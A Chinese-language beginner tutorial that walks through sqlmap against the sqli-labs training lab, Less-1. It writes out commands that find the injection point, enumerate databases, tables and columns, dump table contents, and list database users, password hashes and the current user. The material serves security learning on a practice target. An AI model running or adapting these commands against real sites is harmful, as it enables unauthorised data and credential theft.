时间:2023-10-27来源:系统城装机大师作者:佚名
原来sql注入如此简单
以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
使用命令:
使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"
有图中白色背景的 则判断出有注入点
使用命令:
1 | sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs |
可以看到有五个表
选取一个challenges数据库,获取此库的表名
使用命令:
1 | sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables |
选取表T5M0QG6FM2,获取其中字段名
使用命令:
1 | sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns |
使用命令:
1 | sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump |
使用命令:
1 | sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users |
使用该命令就可以列出所有管理用户
使用命令:
1 | sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords |
使用命令:
1 | sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db |
可以看到当前的数据库是 security
使用命令:
1 | sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user |
当前用户是root
到此这篇关于SQL注入之sqlmap入门学习的文章就介绍到这了
2023-10-27
SQL Server数据库判断最近一次的备份执行结果(最新推荐)2023-10-27
Row_number()函数用法小结2023-10-27
SQL如何实现横表与纵表相互转换1. 首先我们打开sql sever 2. 打开sql配置管理器 3. 开启Telnet服务 4. 去官网下载适配本地jdk的jdbc 5. 配置idea 6. 测试是否连接成功...
2023-10-27
本文沐风晓月带你来了解一下sqlserver数据库的安装及简单使用,本文的主要任务: 安装SQL Server并能够成功的远程链接,然后执行几条简单的SQL语句进行测试即可一. 数据库的介绍1...
2023-10-27